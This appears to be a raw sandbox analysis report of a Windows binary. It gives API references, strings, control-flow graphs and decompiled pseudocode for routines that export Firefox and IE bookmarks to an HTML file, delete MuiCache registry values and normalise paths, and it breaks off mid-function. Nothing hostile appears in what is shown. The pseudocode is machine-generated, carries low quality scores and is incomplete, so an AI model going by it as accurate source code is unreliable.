            0x003a2da6
            0x003a2db2
            0x003a2db5
            0x003a2dbd
            0x003a2dbf
            0x003a2dc2
            0x003a2dc8
            0x003a2dd5
            0x003a2f45
            0x003a2f45
            0x003a2f4b
            0x003a2f58
            0x003a3015
            0x003a3015
            0x003a3021
            0x003a302c
            0x003a3034
            0x003a3035
            0x003a3038
            0x003a3041
            0x003a3041
            0x003a2f70
            0x003a2f75
            0x003a2f86
            0x003a2f8b
            0x003a2f8d
            0x00000000
            0x00000000
            0x003a2f93
            0x003a2f99
            0x003a2f9f
            0x003a2ff4
            0x003a3001
            0x003a3006
            0x003a3008
            0x00000000
            0x00000000
            0x003a2fa7
            0x003a2fad
            0x003a2fb3
            0x003a2fb9
            0x003a2fbf
            0x003a2fc5
            0x003a2fc8
            0x003a2fcc
            0x003a2fd2
            0x003a2fd8
            0x003a2fde
            0x003a2fec
            0x003a2ff1
            0x003a2ff1
            0x003a3010
            0x00000000
            0x003a3010
            0x003a2ded
            0x003a2df2
            0x003a2e03
            0x003a2e08
            0x003a2e0a
            0x00000000
            0x00000000
            0x003a2e16
            0x003a2e1d
            0x003a2e23
            0x003a2e29
            0x003a2e36
            0x003a2f3a
            0x003a2f3a
            0x003a2f40
            0x00000000
            0x003a2e3c
            0x003a2e3c
            0x003a2e42
            0x003a2e42
            0x003a2e4b
            0x003a2e77
            0x003a2e7d
            0x003a2e91
            0x003a2e96
            0x003a2e9c
            0x003a2e9f
            0x003a2ee7
            0x003a2eed
            0x003a2ef3
            0x003a2ef9
            0x003a2eff
            0x003a2f00
            0x003a2f01
            0x003a2f0a
            0x003a2f0f
            0x003a2ea1
            0x003a2ea2
            0x003a2ea8
            0x003a2eaf
            0x003a2eb7
            0x003a2ec1
            0x003a2ecc
            0x003a2ecf
            0x003a2ed4
            0x003a2ed9
            0x003a2ede
            0x003a2ee4
            0x003a2f12
            0x003a2f14
            0x003a2f17
            0x003a2f1d
            0x003a2f14
            0x003a2e77
            0x003a2f25
            0x003a2f30
            0x003a2f38
            0x00000000
            0x003a2f38

            APIs
              • Part of subcall function 003A2225: _vsnwprintf.MSVCRT ref: 003A2257
            • lstrcmpW.KERNEL32(?,Tags,?,?), ref: 003A2E53
            • lstrcmpW.KERNEL32(?,003A1744), ref: 003A2E63
              • Part of subcall function 003A2CD4: WriteFile.KERNEL32(003A1748,00000002,?,00000000), ref: 003A2D1B
              • Part of subcall function 003A2CD4: WriteFile.KERNEL32(?,?,?,00000000), ref: 003A2D6D
              • Part of subcall function 003A2CD4: WriteFile.KERNEL32(003A174C,00000004,?,00000000), ref: 003A2D84
            • lstrcmpW.KERNEL32(?,Smart Bookmarks,?,?), ref: 003A2E73
            • ??3@YAXPAX@Z.MSVCRT ref: 003A2F17
            Strings
            • <DT><A HREF="%s" ADD_DATE="%.0f" LAST_MODIFIED="%.0f" ICON_URI="%s">%s</A>, xrefs: 003A2FE7
            • <DT><A HREF="%s" ADD_DATE="%.0f" FEEDURL="%s">%s</A>, xrefs: 003A2F05
            • Smart Bookmarks, xrefs: 003A2E6D
            • <DT><H3 FOLDED ADD_DATE="%.0f">%s</H3>, xrefs: 003A2EB2
            • Tags, xrefs: 003A2E4D
            • select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d, xrefs: 003A2DDC
            • select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favic, xrefs: 003A2F5F
            • <DL><p>, xrefs: 003A2EBC
            • </DL><p>, xrefs: 003A2ED4
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: FileWritelstrcmp$??3@_vsnwprintf
            • String ID: </DL><p>$<DL><p>$<DT><A HREF="%s" ADD_DATE="%.0f" FEEDURL="%s">%s</A>$<DT><A HREF="%s" ADD_DATE="%.0f" LAST_MODIFIED="%.0f" ICON_URI="%s">%s</A>$<DT><H3 FOLDED ADD_DATE="%.0f">%s</H3>$Smart Bookmarks$Tags$select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d$select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favic
            • API String ID: 1448721381-3632509114
            • Opcode ID: 50410aeb800b21b52531d6b394df730b90ade731a7dc41368c0d64f2b41b1b46
            • Instruction ID: f174d78d6601a57db17b3a4710cac8c53a7c09ba2e0f4b2bb0c14946ab03f655
            • Opcode Fuzzy Hash: 50410aeb800b21b52531d6b394df730b90ade731a7dc41368c0d64f2b41b1b46
            • Instruction Fuzzy Hash: A8518171D00268EADB22AB58CC45AEFB77CEF0A740F0041D6F589A6045DBB59FD58FA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 37%
            			E003A3047(WCHAR* __ecx, void* __edx, void* __fp0) {
            				signed int _v8;
            				char _v532;
            				intOrPtr _v540;
            				char _v544;
            				intOrPtr _v548;
            				char _v572;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t14;
            				void* _t16;
            				void* _t34;
            				void* _t42;
            				struct HINSTANCE__* _t43;
            				char* _t51;
            				char* _t53;
            				void* _t54;
            				void* _t56;
            				void* _t57;
            				void* _t60;
            				signed int _t62;
            				signed int _t64;
            
            				_t68 = __fp0;
            				_t54 = __edx;
            				_t64 = (_t62 & 0xfffffff8) - 0x23c;
            				_v8 =  *0x3a6004 ^ _t64;
            				_t56 = 0;
            				if(E003A295F() == 0) {
            					L9:
            					_t14 = _t56;
            					L10:
            					_pop(_t57);
            					_pop(_t60);
            					_pop(_t42);
            					return E003A4AAD(_t14, _t42, _v8 ^ _t64, _t54, _t57, _t60);
            				}
            				_t16 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
            				 *0x3a600c = _t16;
            				if(_t16 != 0xffffffff) {
            					_push(L"<!DOCTYPE NETSCAPE-Bookmark-file-");
            					E003A2C23(0);
            					 *_t64 = L"1>";
            					E003A2CD4();
            					 *_t64 = L"<!-- This is an automatically generated file.\r\nIt will be read and overwritten.\r\nDo Not Edit! -->";
            					E003A2CD4();
            					 *_t64 = L"<TITLE>Bookmarks</TITLE>\r\n<H1>Bookmarks</H1>";
            					E003A2CD4();
            					 *_t64 = L"<DL><p>";
            					E003A2CD4();
            					_t48 = 2;
            					E003A2D9C(_t48, _t54, __fp0);
            					_t43 = LoadLibraryExW(L"ieframe.dll", 0, 0x60);
            					if(_t43 != 0) {
            						_t64 = _t64 - 0xc;
            						_t48 = _t43;
            						_t34 = E003A32EB(_t43, _t54,  &_v532);
            						FreeLibrary(_t43);
            						if(_t34 >= 0) {
            							E003A2CD4(L"<DT><H3 FOLDED>%s</H3>",  &_v544);
            							_push(L"<DL><p>");
            							E003A2CD4();
            							_t64 = _t64 + 0xc;
            							_t53 = 3;
            							E003A2D9C(_t53, _t54, __fp0);
            							_push(L"</DL><p>");
            							E003A2CD4();
            							_pop(_t48);
            						}
            					}
            					_v548 = _t56;
            					_v544 = _t56;
            					_v540 = _t56;
            					if(E003A2986(_t43, _t48, _t54, _t48,  &_v572) >= 0) {
            						E003A2CD4(L"<DT><H3 FOLDED>%s</H3>", _v548);
            						_push(L"<DL><p>");
            						E003A2CD4();
            						_t64 = _t64 + 0xc;
            						_t51 = 5;
            						E003A2D9C(_t51, _t54, _t68);
            						_push(L"</DL><p>");
            						E003A2CD4();
            					}
            					_push(L"</DL><p>");
            					E003A2CD4();
            					CloseHandle( *0x3a600c);
            					_t56 = 1;
            					E003A2BEB( &_v572);
            					goto L9;
            				}
            				_t14 = 0;
            				goto L10;
            			}

























            0x003a3047
            0x003a3047
            0x003a304f
            0x003a305c
            0x003a3066
            0x003a306f
            0x003a31aa
            0x003a31aa
            0x003a31ac
            0x003a31b3
            0x003a31b4
            0x003a31b5
            0x003a31c0
            0x003a31c0
            0x003a3085
            0x003a308b
            0x003a3093
            0x003a309c
            0x003a30a1
            0x003a30a6
            0x003a30ad
            0x003a30b2
            0x003a30b9
            0x003a30be
            0x003a30c5
            0x003a30ca
            0x003a30d1
            0x003a30d9
            0x003a30da
            0x003a30ed
            0x003a30f1
            0x003a30f3
            0x003a30fa
            0x003a30fd
            0x003a3105
            0x003a310d
            0x003a3119
            0x003a311e
            0x003a3123
            0x003a3128
            0x003a312d
            0x003a312e
            0x003a3133
            0x003a3138
            0x003a313d
            0x003a313d
            0x003a310d
            0x003a3142
            0x003a3148
            0x003a314c
            0x003a3157
            0x003a3162
            0x003a3167
            0x003a316c
            0x003a3171
            0x003a3176
            0x003a3177
            0x003a317c
            0x003a3181
            0x003a3186
            0x003a3187
            0x003a318c
            0x003a3198
            0x003a31a4
            0x003a31a5
            0x00000000
            0x003a31a5
            0x003a3095
            0x00000000

            APIs
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 003A3085
            • LoadLibraryExW.KERNEL32(ieframe.dll,00000000,00000060,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 003A30E7
            • FreeLibrary.KERNEL32(00000000,?), ref: 003A3105
            • CloseHandle.KERNEL32 ref: 003A3198
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: Library$CloseCreateFileFreeHandleLoad
            • String ID: <!-- This is an automatically generated file.It will be read and overwritten.Do Not Edit! -->$<!DOCTYPE NETSCAPE-Bookmark-file-$</DL><p>$</DL><p>$<DL><p>$<DT><H3 FOLDED>%s</H3>$<TITLE>Bookmarks</TITLE><H1>Bookmarks</H1>$ieframe.dll
            • API String ID: 3702922737-715636854
            • Opcode ID: 537cbc66b8379a373fd515410d501039101468f8736276177828693e66d1a3e2
            • Instruction ID: aed3feb45c3432cb5830a99507cc15a2421dc4bf33a4ce562f6efcb7bb653d7d
            • Opcode Fuzzy Hash: 537cbc66b8379a373fd515410d501039101468f8736276177828693e66d1a3e2
            • Instruction Fuzzy Hash: 2C31C0756083006AD227BB799C4BA6F7BA8EB87760F05061DFA409A1C2DB788580C762
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 225 3a32eb-3a332b SHGetFolderPathAndSubDirW 226 3a339c-3a33b8 SHGetFolderPathAndSubDirW 225->226 227 3a332d-3a3341 #672 225->227 228 3a33ba-3a33cb SHSetLocalizedName 226->228 229 3a33ed-3a33ff call 3a4aad 226->229 230 3a3343-3a3354 SHSetLocalizedName 227->230 231 3a3367 227->231 234 3a33d1 call 3a3772 228->234 235 3a335a call 3a3772 230->235 233 3a3367 call 3a389c 231->233 238 3a336c-3a336f 233->238 239 3a33d6-3a33d8 234->239 236 3a335f-3a3365 #675 235->236 236->231 238->239 240 3a3371-3a337f #672 238->240 239->229 241 3a33da-3a33eb call 3a25db 239->241 240->239 242 3a3381-3a3387 240->242 241->229 244 3a338d call 3a35ee 242->244 246 3a3392-3a339a #675 244->246 246->239
            APIs
            • SHGetFolderPathAndSubDirW.SHELL32(00000000,00000006,00000000,00000000,Links,?), ref: 003A3325
            • #672.IERTUTIL(?,00000000), ref: 003A3333
            • #675.IERTUTIL(?,00000000), ref: 003A3365
            • SHSetLocalizedName.SHELL32(?,%windir%\System32\ieframe.dll,00003061), ref: 003A3354
              • Part of subcall function 003A3772: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020006,?,00000000,003A3102), ref: 003A37B8
              • Part of subcall function 003A3772: RegDeleteValueW.ADVAPI32(?,?), ref: 003A37DB
              • Part of subcall function 003A3772: RegDeleteValueW.ADVAPI32(?,?), ref: 003A3838
              • Part of subcall function 003A3772: RegCloseKey.ADVAPI32(?), ref: 003A3875
            • #672.IERTUTIL(?,00000000), ref: 003A3377
            • #675.IERTUTIL(?,00000000), ref: 003A3398
            • SHGetFolderPathAndSubDirW.SHELL32(00000000,00008006,00000000,00000000,Links,?), ref: 003A33B2
            • SHSetLocalizedName.SHELL32(?,%windir%\System32\ieframe.dll,00003061), ref: 003A33CB
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: #672#675DeleteFolderLocalizedNamePathValue$CloseOpen
            • String ID: %windir%\System32\ieframe.dll$Links
            • API String ID: 4100310970-3729751556
            • Opcode ID: cc6f75dfc6ced1d160b95aa5329d7c5fd47ed4ab58ee87769f5c5137cd373a65
            • Instruction ID: b29a8b7e04f39d87af12a66311cd4361867ce486516a8bbf5997d68f8f997cef
            • Opcode Fuzzy Hash: cc6f75dfc6ced1d160b95aa5329d7c5fd47ed4ab58ee87769f5c5137cd373a65
            • Instruction Fuzzy Hash: C421F4B1B45218ABDF23EB25DC8AEAB736DEB43740F110561F905E71A0DBB0DE448B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 247 3a3772-3a3798 call 3a3a1b 250 3a379a-3a37c0 RegOpenKeyExW 247->250 251 3a387b-3a3881 250->251 252 3a37c6-3a37cd 250->252 251->250 255 3a3887-3a3896 call 3a4aad 251->255 253 3a37cf-3a37e3 RegDeleteValueW 252->253 254 3a3810-3a3817 252->254 256 3a37fb-3a380d call 3a3a1b 253->256 257 3a37e5-3a37f9 call 3a3a1b 253->257 259 3a3819-3a3840 call 3a479b RegDeleteValueW 254->259 260 3a386f-3a3875 RegCloseKey 254->260 256->254 257->254 268 3a3859-3a386c call 3a3a1b 259->268 269 3a3842-3a3857 call 3a3a1b 259->269 260->251 268->260 269->260
            C-Code - Quality: 75%
            			E003A3772(short* __edx, void* __edi) {
            				signed int _v8;
            				short _v528;
            				void* _v532;
            				void* __ebx;
            				void* __esi;
            				long _t31;
            				long _t36;
            				void* _t46;
            				int _t47;
            				signed int _t48;
            				void* _t49;
            
            				_t45 = __edi;
            				_t44 = __edx;
            				_v8 =  *0x3a6004 ^ _t48;
            				_push(L"[IECleanup LIB] CleanupMuiCache()");
            				_push(0);
            				E003A3A1B(0, __edx, __edi, _t46);
            				_t47 = 0;
            				do {
            					_v532 = 0;
            					if(RegOpenKeyExW(0x80000001,  *(_t47 + 0x3a6010), 0, 0x20006,  &_v532) != 0) {
            						goto L11;
            					}
            					if(( *(_t47 + 0x3a6018) & 0x00000001) != 0) {
            						_t36 = RegDeleteValueW(_v532,  *(_t47 + 0x3a6014));
            						if(_t36 != 0) {
            							_push(_t36);
            							E003A3A1B(0, _t44, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Unable to delete \'%s\', Result=%d",  *(_t47 + 0x3a6014));
            							_t49 = _t49 + 0x10;
            						} else {
            							E003A3A1B(0, _t44, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Successfully deleted \'%s\'",  *(_t47 + 0x3a6014));
            							_t49 = _t49 + 0xc;
            						}
            					}
            					if(( *(_t47 + 0x3a6018) & 0x00000002) != 0) {
            						_t44 =  &_v528;
            						E003A479B( *(_t47 + 0x3a6014),  &_v528,  *(_t47 + 0x3a6014));
            						_t31 = RegDeleteValueW(_v532,  &_v528);
            						if(_t31 != 0) {
            							_push(_t31);
            							E003A3A1B(0,  &_v528, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Unable to delete \'%s\', Result=%d",  &_v528);
            							_t49 = _t49 + 0x10;
            						} else {
            							E003A3A1B(0,  &_v528, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Successfully deleted \'%s\'",  &_v528);
            							_t49 = _t49 + 0xc;
            						}
            					}
            					_t27 = RegCloseKey(_v532);
            					L11:
            					_t47 = _t47 + 0xc;
            				} while (_t47 < 0x24);
            				return E003A4AAD(_t27, 0, _v8 ^ _t48, _t44, _t45, _t47);
            			}














            0x003a3772
            0x003a3772
            0x003a3784
            0x003a378b
            0x003a3790
            0x003a3791
            0x003a3798
            0x003a379a
            0x003a37a0
            0x003a37c0
            0x00000000
            0x00000000
            0x003a37cd
            0x003a37db
            0x003a37e3
            0x003a37fb
            0x003a3808
            0x003a380d
            0x003a37e5
            0x003a37f1
            0x003a37f6
            0x003a37f6
            0x003a37e3
            0x003a3817
            0x003a3820
            0x003a3826
            0x003a3838
            0x003a3840
            0x003a3859
            0x003a3867
            0x003a386c
            0x003a3842
            0x003a384f
            0x003a3854
            0x003a3854
            0x003a3840
            0x003a3875
            0x003a387b
            0x003a387b
            0x003a387e
            0x003a3896

            APIs
              • Part of subcall function 003A3A1B: DecodePointer.KERNEL32 ref: 003A3A83
            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020006,?,00000000,003A3102), ref: 003A37B8
            • RegDeleteValueW.ADVAPI32(?,?), ref: 003A37DB
            • RegDeleteValueW.ADVAPI32(?,?), ref: 003A3838
            • RegCloseKey.ADVAPI32(?), ref: 003A3875
            Strings
            • [IECleanup LIB] CleanupMuiCache() - Unable to delete '%s', Result=%d, xrefs: 003A3802, 003A3861
            • [IECleanup LIB] CleanupMuiCache() - Successfully deleted '%s', xrefs: 003A37EB, 003A3849
            • [IECleanup LIB] CleanupMuiCache(), xrefs: 003A378B
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: DeleteValue$CloseDecodeOpenPointer
            • String ID: [IECleanup LIB] CleanupMuiCache()$[IECleanup LIB] CleanupMuiCache() - Successfully deleted '%s'$[IECleanup LIB] CleanupMuiCache() - Unable to delete '%s', Result=%d
            • API String ID: 2742595093-2876198904
            • Opcode ID: 1751cf5c04dee118284a56622e028da831c3fd942e64ab484cb495cff6904eeb
            • Instruction ID: 7e4ccb9ea925fd3ba3c1f07bb8026afaf1714939ee4e560be7ce7cc87cb74cbb
            • Opcode Fuzzy Hash: 1751cf5c04dee118284a56622e028da831c3fd942e64ab484cb495cff6904eeb
            • Instruction Fuzzy Hash: 2921F7B294431CABD723DB608C8AFEA776DEF03300F0408A9F95E61092D7715F949B50
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 274 3a4083-3a40a5 call 3a3aa8 277 3a40ab-3a40c3 call 3a3ca0 274->277 278 3a435d-3a4362 274->278 281 3a40ed-3a4102 call 3a46c3 277->281 282 3a40c5-3a40eb call 3a3ae7 277->282 288 3a4127-3a4131 iswalpha 281->288 289 3a4104-3a4117 iswalpha 281->289 287 3a4132-3a4137 282->287 290 3a433e-3a4357 call 3a3aa8 287->290 291 3a413d-3a413f 287->291 288->287 289->287 292 3a4119-3a4120 289->292 301 3a4359 290->301 302 3a435c 290->302 293 3a4142-3a4148 291->293 292->287 295 3a4122-3a4125 292->295 296 3a414e-3a415f wcschr 293->296 297 3a4365 293->297 295->287 299 3a4161-3a4165 296->299 300 3a4167-3a416c 296->300 303 3a4368-3a436a 297->303 304 3a417e-3a4189 299->304 305 3a416f-3a4179 300->305 301->302 302->278 303->290 306 3a436c-3a436e 303->306 308 3a418f-3a4195 304->308 309 3a4337 304->309 305->305 307 3a417b 305->307 310 3a439b-3a439f 306->310 311 3a4370-3a4379 306->311 307->304 308->309 313 3a419b-3a419e 308->313 309->290 312 3a43a2-3a43ab 310->312 311->310 314 3a437b-3a437d 311->314 312->312 315 3a43ad-3a43b9 312->315 316 3a41a0-3a41a6 313->316 317 3a41f7-3a41fa 313->317 318 3a437f-3a4386 314->318 319 3a4396-3a4398 314->319 321 3a43bb-3a43cc call 3a46c3 315->321 322 3a43d4-3a43da 315->322 325 3a429b-3a42be call 3a3b87 316->325 326 3a41ac-3a41ae 316->326 323 3a428b-3a428d 317->323 324 3a4200-3a4206 317->324 318->310 320 3a4388-3a4392 318->320 319->310 320->314 328 3a4394 320->328 321->322 348 3a43ce-3a43d0 321->348 331 3a43dc-3a43e1 322->331 332 3a43e5-3a43ec 322->332 323->325 327 3a428f-3a4295 323->327 324->325 333 3a420c-3a4210 324->333 346 3a42c0-3a42c3 325->346 347 3a4317-3a431a 325->347 334 3a41c2-3a41c7 326->334 335 3a41b0 326->335 327->325 336 3a4297-3a4298 327->336 328->310 331->332 342 3a43fe-3a4400 332->342 343 3a43ee-3a43f2 332->343 333->325 341 3a4216-3a4218 333->341 337 3a41c9-3a41d2 call 3a3d00 334->337 338 3a41b3 334->338 335->338 336->325 337->338 360 3a41d4-3a41f5 call 3a3aa8 337->360 344 3a41b6-3a41b8 338->344 349 3a421a-3a4223 call 3a3d00 341->349 350 3a427c-3a4281 341->350 342->302 343->342 351 3a43f4-3a43fa 343->351 344->290 352 3a41be-3a41c0 344->352 346->347 354 3a42c5-3a42cb 346->354 358 3a431d-3a4320 347->358 348->322 363 3a4279 349->363 364 3a4225-3a422a 349->364 356 3a4283-3a4286 350->356 357 3a4271-3a4274 350->357 351->342 352->293 354->347 361 3a42cd-3a42d4 354->361 356->344 357->344 359 3a4323 358->359 366 3a432b-3a4335 359->366 360->344 361->366 367 3a42d6-3a42dc 361->367 363->350 368 3a423b-3a423d 364->368 369 3a422c-3a422e 364->369 366->303 371 3a42de-3a42e4 367->371 372 3a42e6-3a42ef 367->372 374 3a423f-3a4249 368->374 373 3a422f-3a4235 369->373 371->366 371->372 372->358 375 3a42f1-3a42f4 372->375 373->374 376 3a4237-3a4239 373->376 377 3a424b-3a4253 374->377 378 3a4255-3a4257 374->378 375->358 379 3a42f6-3a42fa 375->379 376->368 376->373 380 3a425a-3a426e call 3a3aa8 377->380 378->380 379->358 381 3a42fc-3a4315 379->381 380->357 381->359
            C-Code - Quality: 98%
            			E003A4083(wchar_t* __ecx, void* __eflags, wchar_t* _a4) {
            				short _v8;
            				void* _v12;
            				void* _v16;
            				signed int _v20;
            				intOrPtr* _v24;
            				intOrPtr _v28;
            				short _t81;
            				intOrPtr _t89;
            				intOrPtr* _t90;
            				long _t91;
            				void* _t93;
            				intOrPtr* _t99;
            				long _t102;
            				intOrPtr _t105;
            				short _t107;
            				void* _t108;
            				signed int _t109;
            				void* _t111;
            				void* _t112;
            				void* _t118;
            				void* _t119;
            				intOrPtr _t122;
            				long* _t123;
            				void* _t126;
            				intOrPtr _t129;
            				wchar_t* _t132;
            				intOrPtr _t134;
            				wchar_t* _t137;
            				long _t141;
            				wchar_t* _t142;
            				long _t145;
            				wchar_t* _t150;
            				signed int _t151;
            				signed int _t152;
            				signed int _t154;
            				long* _t167;
            				void* _t169;
            				wchar_t* _t170;
            				intOrPtr _t172;
            				wchar_t* _t178;
            				wchar_t* _t180;
            				void* _t181;
            				short* _t182;
            				intOrPtr _t183;
            				long* _t184;
            				intOrPtr* _t185;
            				void* _t186;
            				short* _t187;
            
            				_t178 = __ecx;
            				_t81 = E003A3AA8(__ecx, 0x104, 0x3a1744);
            				_v8 = _t81;
            				if(_t81 < 0) {
            					return _t81;
            				}
            				_t132 = _a4;
            				_t137 = _t132;
            				_v16 = 0x104;
            				_v12 = 0x104;
            				if(E003A3CA0(_t137,  &_v20) == 0) {
            					_t180 = _t178;
            					_a4 = _t180;
            					if(E003A46C3(_t132, L"\\\\?\\", 4) == 0) {
            						iswalpha( *_t132 & 0x0000ffff);
            					} else {
            						_t123 =  &(_t132[2]);
            						_v20 = _t123;
            						if(iswalpha( *_t123 & 0x0000ffff) != 0) {
            							_t126 = 0x3a;
            							if(_t132[2] == _t126) {
            								_t132 = _v20;
            							}
            						}
            					}
            				} else {
            					_push(_t137);
            					_t129 = E003A3AE7(_t178, 0x104, L"\\\\",  &_a4,  &_v12);
            					_t132 = _v20;
            					_t180 = _a4;
            					_v8 = _t129;
            					_v16 = _v12;
            				}
            				if(_v8 < 0) {
            					L64:
            					E003A3AA8(_t178, 0x104, 0x3a1744);
            					_t89 = _v8;
            					if(_t89 == 0x8007007a) {
            						_t89 = _t89 + 0x54;
            					}
            					L66:
            					return _t89;
            				}
            				_t90 = 0;
            				_v24 = 0;
            				while(1) {
            					_t141 = 0x5c;
            					if( *_t132 == _t90) {
            						break;
            					}
            					_t170 = wcschr(_t132, _t141);
            					_v28 = _t170;
            					if(_t170 == 0) {
            						_t150 = _t132;
            						_v20 =  &(_t150[0]);
            						do {
            							_t102 =  *_t150;
            							_t150 =  &(_t150[0]);
            						} while (_t102 != _v24);
            						_t151 = _t150 - _v20;
            						L16:
            						_t152 = _t151 >> 1;
            						_v20 = _t152;
            						if(_t152 > 0x100 || _t152 >= 0x8000) {
            							_v8 = 0x800700ce;
            							goto L64;
            						} else {
            							if(_t152 != 1) {
            								if(_t152 != 2) {
            									if(_t152 == 0) {
            										_t111 = 0x5c;
            										if( *_t132 == _t111) {
            											_t152 = _t152 + 1;
            											_v20 = _t152;
            										}
            									}
            									L49:
            									_push(_t152);
            									_t105 = E003A3B87(_t180, _v16, _t132, _t152,  &_a4,  &_v12);
            									_t154 = _v20;
            									_t183 = _t105;
            									_v8 = _t183;
            									if(_t183 != 0x8007007a || _t154 != 1) {
            										L59:
            										_v16 = _v12;
            										goto L60;
            									} else {
            										_t108 = 0x5c;
            										if( *_t132 != _t108) {
            											goto L59;
            										}
            										_t109 = _t132[0] & 0x0000ffff;
            										if(_t109 == 0) {
            											L62:
            											_t180 = _a4;
            											_t134 = 0;
            											_v8 = 0;
            											L69:
            											if(_t134 < 0) {
            												goto L64;
            											}
            											if(_t180 <= _t178) {
            												L77:
            												_t142 = _t178;
            												_t167 =  &(_t142[0]);
            												do {
            													_t91 =  *_t142;
            													_t142 =  &(_t142[0]);
            												} while (_t91 != 0);
            												_t181 = _t178 + (_t142 - _t167 >> 1) * 2;
            												if(_t181 >=  &(_t178[3]) && E003A46C3(_t181 - 0xe, L"::$DATA", 7) != 0) {
            													 *((short*)(_t181 - 0xe)) = 0;
            												}
            												_t145 = 0x5c;
            												if( *_t178 == 0) {
            													 *_t178 = _t145;
            													_t178[0] = 0;
            												}
            												_t93 = 0x3a;
            												if(_t178[0] == _t93 && _t178[1] == 0) {
            													_t178[1] = _t145;
            													_t178[1] = 0;
            												}
            												_t89 = 0;
            												goto L66;
            											}
            											_t182 = _t180 - 2;
            											_t169 = 0x2e;
            											if( *_t182 != _t169) {
            												goto L77;
            											}
            											while(_t182 != _t178) {
            												_t99 = _t182 - 2;
            												if( *_t99 == 0x2a) {
            													goto L77;
            												}
            												 *_t182 = 0;
            												_t182 = _t99;
            												if( *_t99 == _t169) {
            													continue;
            												}
            												goto L77;
            											}
            											 *_t182 = 0;
            											goto L77;
            										}
            										_t186 = 0x2e;
            										if(_t109 != _t186 || _t132[1] != 0) {
            											_t172 = _v12;
            											_v16 = _t172;
            											if(_t172 != 1 || _t109 != _t186 || _t132[1] != _t186) {
            												L60:
            												_t107 = _v8;
            												_t180 = _a4;
            												goto L61;
            											} else {
            												_t187 = _a4;
            												_t107 = 0;
            												_v8 = 0;
            												_v16 = 0;
            												_v12 = 0;
            												 *_t187 = 0;
            												_t180 = _t187 + 2;
            												_a4 = _t180;
            												L61:
            												_t132 = _t132 + _t154 * 2;
            												L23:
            												if(_t107 < 0) {
            													goto L64;
            												}
            												_t90 = 0;
            												continue;
            											}
            										} else {
            											goto L62;
            										}
            									}
            								}
            								_t112 = 0x2e;
            								if( *_t132 != _t112 || _t132[0] != _t112) {
            									goto L49;
            								} else {
            									if(_t180 <= _t178) {
            										L44:
            										_t107 = _v8;
            										if(_t170 == 0) {
            											L42:
            											_t132 =  &(_t132[1]);
            											goto L23;
            										}
            										_t41 = _t170 + 2; // 0x2
            										_t132 = _t41;
            										goto L23;
            									}
            									if(E003A3D00(_t178) != 0) {
            										_t170 = _v28;
            										goto L44;
            									}
            									_t184 =  &(_t180[0]);
            									if(_t178 >= _t184) {
            										L37:
            										_t185 = 0;
            										L38:
            										_a4 = _t185;
            										_t156 = 0x104;
            										if(_t185 == 0) {
            											_t180 = _t178;
            											_a4 = _t180;
            										} else {
            											_t156 = 0x104 - (_t185 - _t178 >> 1);
            										}
            										_v12 = _t156;
            										_v16 = _t156;
            										_t107 = E003A3AA8(_t180, _t156, 0x3a1744);
            										_v8 = _t107;
            										goto L42;
            									}
            									_t118 = 0x5c;
            									while(1) {
            										_t185 = _t184 - 2;
            										if( *_t185 == _t118) {
            											goto L38;
            										}
            										if(_t178 < _t185) {
            											continue;
            										}
            										goto L37;
            									}
            									goto L38;
            								}
            							}
            							_t119 = 0x2e;
            							if( *_t132 != _t119) {
            								goto L49;
            							}
            							if(_t170 == 0) {
            								_t132 =  &(_t132[0]);
            								if(_t180 <= _t178 || E003A3D00(_t178) != 0) {
            									L22:
